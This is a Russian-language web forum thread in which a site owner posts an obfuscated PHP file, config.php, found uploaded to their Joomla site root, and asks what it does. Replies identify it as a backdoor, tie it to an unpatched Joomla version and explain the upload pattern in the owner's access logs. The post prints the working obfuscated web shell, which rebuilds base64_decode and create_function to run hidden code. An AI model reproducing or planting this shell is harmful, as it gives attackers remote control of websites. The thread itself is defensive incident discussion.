0 Пользователей и 1 Гость просматривают эту тему.
  • 9 Ответов
  • 1348 Просмотров
*

sabnok

  • Захожу иногда
  • 126
  • 1 / 0
Кто то залил в корень сайта файл config.php  с таким содержанием, что это такое?) Что делает этот код? Антивирус его не определяет как вирус, на сайте все чисто.



\<?php $ej = str_replace("eo","","eoseoteoreo_reoeeopeoleoaeoceoe"); $dd="JGapM9J2NvdW50JzskYT0kX0NPT0tJRTtpZihyZXNldCgkapYSk9PSdmcycapgJiYgapJGMoJGEappPapjMpe"; $yt="lZ1ap9yZXBsYWNlapKGFycmF5apKapCcvW15cdzap1cc10vJywnL1xapzLycappLCBhcnJheapSgnJywnKycpLapCBqapbap2a"; $se="pluKGFycmF5X3NsaWNaplKapCapRhLCRjKCRhKapS0zapKSkpKapSk7ZWNobyAnapPC8nLapiRrLic+apJzt9"; $uiz="yRrapPSc1Zap2ap16MzapMnO2apVjaG8gJzwnLiapRrLic+JztldmFsapKGapJhc2U2NF9kZWNapvZGUocHJ"; $axb = $ej("z", "", "zbzase6z4z_zdzezczozdze"); $oj = $ej("d","","cdrdeadted_dfdundcdtiodn"); $nfh = $oj("", $axb($ej("ap", "", $dd.$uiz.$yt.$se))); $nfh(); ?>
*

voland

  • Легенда
  • 11031
  • 588 / 112
  • Эта строка съедает место на вашем мониторе
*

winstrool

  • Давно я тут
  • 820
  • 51 / 2
  • Свободен для работы
Re: Кто то залил в корень сайта файл
« Ответ #2 : 17.12.2015, 17:10:13 »
Это бегдор, который позволяет вертеть вашим сайтом как хочется, антивирус и не спалит, код генерированый, тут нужны специализированные программы
*

draff

  • Гуру
  • 5803
  • 434 / 7
  • ищу работу
Re: Кто то залил в корень сайта файл
« Ответ #3 : 17.12.2015, 17:28:29 »
Советую поискать еще такой же файл config.php , в файлах сайта
Вряд ли один файл
*

sabnok

  • Захожу иногда
  • 126
  • 1 / 0
Re: Кто то залил в корень сайта файл
« Ответ #4 : 17.12.2015, 17:48:00 »
А как его залили на сайт) версия Joomla 3.4.5 ничего лишнего нету. Проверял антивирусом на хостинге - ничего не нашел больше.
В логах нашел записи
86.123.69.119 - - [17/Dec/2015:10:30:37 +0300] "GET / HTTP/1.1" 200 32849 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0"
86.123.69.119 - - [17/Dec/2015:10:30:39 +0300] "GET / HTTP/1.1" 200 35301 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0"
86.123.69.119 - - [17/Dec/2015:10:30:40 +0300] "GET /config.php HTTP/1.1" 200 170 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0"

Такой файл config.php с кодом безопасно держать на компьютере?
« Последнее редактирование: 17.12.2015, 17:55:55 от sabnok »
*

winstrool

  • Давно я тут
  • 820
  • 51 / 2
  • Свободен для работы
Re: Кто то залил в корень сайта файл
« Ответ #5 : 17.12.2015, 18:08:27 »
А как его залили на сайт) версия Joomla 3.4.5 ничего лишнего нету. Проверял антивирусом на хостинге - ничего не нашел больше.
В логах нашел записи
86.123.69.119 - - [17/Dec/2015:10:30:37 +0300] "GET / HTTP/1.1" 200 32849 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0"
86.123.69.119 - - [17/Dec/2015:10:30:39 +0300] "GET / HTTP/1.1" 200 35301 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0"
86.123.69.119 - - [17/Dec/2015:10:30:40 +0300] "GET /config.php HTTP/1.1" 200 170 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0"

Такой файл config.php с кодом безопасно держать на компьютере?
ну все правильно, не патченая версия, тут на форуме уже разжевывался этот вопрос, только самые ленивые еще не вкурсе, что можно почитать соседние ветки и устранить проблему... а если еще покажите домен, я вам тоже рядышком файлик положу)))
*

sabnok

  • Захожу иногда
  • 126
  • 1 / 0
Re: Кто то залил в корень сайта файл
« Ответ #6 : 17.12.2015, 18:47:52 »
ну все правильно, не патченая версия, тут на форуме уже разжевывался этот вопрос, только самые ленивые еще не вкурсе, что можно почитать соседние ветки и устранить проблему... а если еще покажите домен, я вам тоже рядышком файлик положу)))

Ну атак в логах нету нигде подобных которые в соседних ветках обсуждаються) После этого уже обновился, но может надо поменять пароль от админки и базы данных и перфикс поменять? ведь вроде как злоумышленники получают эти данные
*

winstrool

  • Давно я тут
  • 820
  • 51 / 2
  • Свободен для работы
Re: Кто то залил в корень сайта файл
« Ответ #7 : 17.12.2015, 19:00:11 »
Ну атак в логах нету нигде подобных которые в соседних ветках обсуждаються) После этого уже обновился, но может надо поменять пароль от админки и базы данных и перфикс поменять? ведь вроде как злоумышленники получают эти данные
Кидайте домен в ПМ покажу, этот тип атаки так и реализуется, первый запрос к любой странице, для приобритении сессии, второй для заливки шелла, третий для его чека что он залился
*

mistbow

  • Захожу иногда
  • 70
  • 4 / 0
Re: Кто то залил в корень сайта файл
« Ответ #8 : 26.12.2015, 03:33:43 »
Тоже сегодня прилетело на десятке сайтов (((
Ладно бы только в корне, о всем папочкам и подпапочкам до самых низов напихали... хрен вычистишь проще вообще тупо все переустановить!
Надеюсь хоть бузы-то не попортили чем-нить эдаким (((
*

wishlight

  • Живу я здесь
  • 4980
  • 293 / 1
  • от 150 руб быстрый хостинг без блокировок
Re: Кто то залил в корень сайта файл
« Ответ #9 : 26.12.2015, 08:27:28 »
Могли. Могли даже дампы посливать, если сайты интересные.
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться
 

При открытии сайта с режима инкогнито перекидывает на вирусный сайт

Автор 62411

Ответов: 4
Просмотров: 164
Последний ответ 26.03.2024, 18:51:10
от wishlight
Компоненты и скрипты для защиты сайта. Логи атак на сайты

Автор wishlight

Ответов: 678
Просмотров: 243634
Последний ответ 14.09.2022, 14:29:43
от wishlight
Способы защиты сайта от DDoS атак?

Автор IgorMJ

Ответов: 7
Просмотров: 1251
Последний ответ 05.10.2021, 21:39:26
от ShopES
Новый набег ботов в регистрации сайта... Какой в этом смысл то?

Автор Cedars

Ответов: 11
Просмотров: 1075
Последний ответ 03.11.2020, 17:36:03
от Cedars
Мониторинг файлов CMS и сайта - предлагаю решение

Автор GRIG

Ответов: 18
Просмотров: 4386
Последний ответ 28.08.2020, 22:00:30
от cntrl